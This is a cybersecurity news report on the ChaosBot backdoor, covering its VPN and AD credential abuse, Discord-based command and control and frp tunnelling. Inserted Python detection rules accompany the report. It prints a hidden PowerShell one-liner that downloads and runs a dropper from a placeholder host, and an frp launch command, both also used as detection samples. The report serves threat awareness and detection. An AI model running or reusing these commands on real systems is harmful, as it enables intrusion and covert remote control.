Cyber Security News

New Chaosbot Leveraging CiscoVPN and Active Directory Passwords to Execute Network Commands

ChaosBot surfaced in late September 2025 as a sophisticated Rust-based backdoor targeting enterprise networks. Initial investigations revealed that threat actors gained entry by exploiting compromised CiscoVPN credentials coupled with over-privileged Active Directory service accounts.

Once inside, ChaosBot was stealthily deployed via side-loading techniques using the legitimate Microsoft Edge component identity_helper.exe from the C:\Users\Public\Libraries directory.

The malware’s Rust implementation and reliance on Discord for its command and control (C2) operations underscore an innovative blend of modern development practices and misappropriated mainstream services.

eSentire analysts noted that the threat actor behind ChaosBot operated through a Discord profile named “chaos_00019,” suggesting a deliberate attempt to mask communications within popular social platforms.

Victim demographics indicate a focus on Vietnamese-speaking environments, although lateral-movement experiments against other targets have also been observed.

Attack Chain (Source – eSentire)

The combination of VPN credential abuse and over-privileged AD accounts enabled seamless WMI-based remote execution, facilitating widespread deployment before detection.

Following initial compromise, ChaosBot conducts reconnaissance and establishes a fast reverse proxy (frp) tunnel to maintain persistent access.

The malware downloads frp and its configuration file (node.ini) into C:\Users\Public\Music, then launches the proxy via a PowerShell-executed shell command:

powershell -Command "$OutputEncoding = [System.Text.Encoding]::UTF8; C:\Users\Public\Music\node.exe -c C:\Users\Public\Music\node.ini"

This sequence creates a hidden communication channel over port 7000 to a remote AWS host, bypassing perimeter defenses and supporting subsequent lateral movements.

Infection Mechanism

The core infection mechanism of ChaosBot leverages two primary vectors: credential-based access and malicious Windows shortcuts.

In the former, valid CiscoVPN credentials and an over-privileged AD account named “serviceaccount” are used to run WMI commands that drop and execute the ChaosBot payload (msedge_elf.dll) on remote hosts.

The shortcut vector involves phishing emails containing .lnk files that execute a PowerShell one-liner to fetch and launch ChaosBot while opening a decoy PDF themed after the State Bank of Vietnam to distract the user.

PowerShell-based malicious shortcut (Source – eSentire)

This PowerShell command resembles:

powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'hxxps://malicious-domain/dropper.exe' -OutFile $env:Temp\chaosbot.exe; Start-Process $env:Temp\chaosbot.exe"
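The endpoint-side patterns reported above (a signed Edge helper running from C:\Users\Public\Libraries, the frp launcher under C:\Users\Public\Music, the UTF-8 preamble, and the hidden Invoke-WebRequest one-liner) can be turned into process-creation triage rules. The following is an added example, not code from the article or from eSentire; the Sysmon-style events, field names and rule names are my own constructions, and the utf8_preamble rule is deliberately treated as a weak signal because legitimate scripts also set that encoding.

```python
import re

# Constructed Sysmon-style process-creation events (not real telemetry); the
# command lines reproduce the patterns described in the article.
SAMPLE_EVENTS = [
    {"image": r"C:\Users\Public\Libraries\identity_helper.exe",
     "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmdline": r"C:\Users\Public\Libraries\identity_helper.exe"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Users\Public\Libraries\identity_helper.exe",
     "cmdline": r'powershell -Command "$OutputEncoding = [System.Text.Encoding]::UTF8; '
                r'C:\Users\Public\Music\node.exe -c C:\Users\Public\Music\node.ini"'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'''powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'hxxps://malicious-domain/dropper.exe' '''
                r'''-OutFile $env:Temp\chaosbot.exe; Start-Process $env:Temp\chaosbot.exe"'''},
    {"image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",  # benign control
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-first-run'},
]

PUBLIC_DIR = re.compile(r"^c:\\users\\public\\", re.I)           # world-writable staging dir
SYSTEM_DIR = re.compile(r"^c:\\windows\\", re.I)
WMI_HOST = re.compile(r"\\wmiprvse\.exe$", re.I)                  # WMI remote-exec host process
FRP_LAUNCH = re.compile(r"\\users\\public\\music\\\S+\.exe\s+-c\s+\S+\.ini", re.I)
UTF8_PREAMBLE = re.compile(r"\$OutputEncoding\s*=\s*\[System\.Text\.Encoding\]::UTF8", re.I)

def hidden_download(cmd: str) -> bool:
    """Hidden window + web fetch to %TEMP% + immediate execution, as in the .lnk one-liner."""
    c = cmd.lower()
    return all(t in c for t in ("-windowstyle hidden", "invoke-webrequest", "start-process", "$env:temp"))

# Ordered (name, predicate) pairs; the names are my own labels, not vendor rule IDs.
RULES = [
    ("public_dir_exec", lambda e: bool(PUBLIC_DIR.match(e["image"]))),
    ("wmi_spawn", lambda e: bool(WMI_HOST.search(e["parent"])) and not SYSTEM_DIR.match(e["image"])),
    ("frp_launch", lambda e: bool(FRP_LAUNCH.search(e["cmdline"]))),
    ("utf8_preamble", lambda e: bool(UTF8_PREAMBLE.search(e["cmdline"]))),  # weak signal on its own
    ("hidden_download", lambda e: hidden_download(e["cmdline"])),
]

def triage(events):
    """Return {event_index: [matched rule names]} for events that hit at least one rule."""
    hits = {}
    for i, ev in enumerate(events):
        matched = [name for name, pred in RULES if pred(ev)]
        if matched:
            hits[i] = matched
    return hits

if __name__ == "__main__":
    for i, names in triage(SAMPLE_EVENTS).items():
        print(i, SAMPLE_EVENTS[i]["image"], names)
```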

Upon execution, ChaosBot validates its embedded Discord bot token with a GET request to https://discord.com/api/v10/users/@me, then creates a dedicated channel named after the victim’s hostname using a POST to https://discord.com/api/v10/guilds/<GUILD_ID>/channels.

Subsequent shell commands fetched from Discord messages are executed in new PowerShell processes prefixed with UTF-8 encoding directives to preserve output integrity.

Results, including stdout, stderr, screenshots, or file attachments, are returned to the threat actor’s Discord channel via multipart/form-data POST requests.
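The Discord API sequence described above (token check against users/@me, channel creation under guilds/<GUILD_ID>/channels, multipart/form-data uploads of results) is also visible from the network side. The following is an added example, not code from the article or from eSentire: it runs a defender-side classifier over constructed proxy log lines and flags that sequence when it originates from a process that is not an expected Discord client; the log format, host names and the EXPECTED_CLIENTS list are assumptions to tune per environment.

```python
import re
from collections import defaultdict

# Constructed proxy log lines: host, process, method, URL, content-type ("-" if none).
# Guild and channel IDs are made-up placeholders, not indicators from the article.
SAMPLE_LOG = """\
WS-0417 identity_helper.exe GET https://discord.com/api/v10/users/@me -
WS-0417 identity_helper.exe POST https://discord.com/api/v10/guilds/123456789012345678/channels application/json
WS-0417 powershell.exe POST https://discord.com/api/v10/channels/987654321098765432/messages multipart/form-data
WS-0201 Discord.exe GET https://discord.com/api/v9/users/@me -
WS-0201 msedge.exe POST https://discord.com/api/v9/channels/222/messages multipart/form-data
"""

# Processes expected to talk to the Discord API on a workstation (assumption; tune per estate).
EXPECTED_CLIENTS = {"discord.exe", "msedge.exe", "chrome.exe", "firefox.exe"}
API = re.compile(r"^https://discord\.com/api/v\d+/(.*)$", re.I)

def parse(log: str):
    """Split the constructed log into event dicts; fields are normalised for comparison."""
    events = []
    for line in log.splitlines():
        host, proc, method, url, ctype = line.split()
        events.append({"host": host, "proc": proc.lower(), "method": method.upper(),
                       "url": url, "ctype": ctype.lower()})
    return events

def findings(events):
    """Map host -> ordered findings; only non-expected processes hitting the Discord API count."""
    out = defaultdict(list)
    for ev in events:
        m = API.match(ev["url"])
        if not m or ev["proc"] in EXPECTED_CLIENTS:
            continue
        path = m.group(1)
        if ev["method"] == "GET" and path == "users/@me":
            out[ev["host"]].append(("token_check", ev["proc"]))       # bot token validation
        elif ev["method"] == "POST" and re.fullmatch(r"guilds/\d+/channels", path):
            out[ev["host"]].append(("channel_create", ev["proc"]))    # per-victim channel
        elif (ev["method"] == "POST" and re.fullmatch(r"channels/\d+/messages", path)
              and "multipart/form-data" in ev["ctype"]):
            out[ev["host"]].append(("result_upload", ev["proc"]))     # stdout/screenshot/file
        else:
            out[ev["host"]].append(("unexpected_client", ev["proc"]))
    return dict(out)

if __name__ == "__main__":
    for host, items in findings(parse(SAMPLE_LOG)).items():
        print(host, items)
```

A host that shows token_check followed by channel_create from the same non-browser process is the strongest sequence to alert on; a lone result_upload from powershell.exe still merits a look.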

This dual-vector approach—credential exploitation and social engineering using malicious shortcuts—combined with the use of legitimate services for C2, makes ChaosBot particularly challenging to detect and remediate.

Asset masquerading through built-in Windows binaries and rigorous encoding practices further obscure its presence within targeted environments.


Tushar Subhra Dutta

Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics.
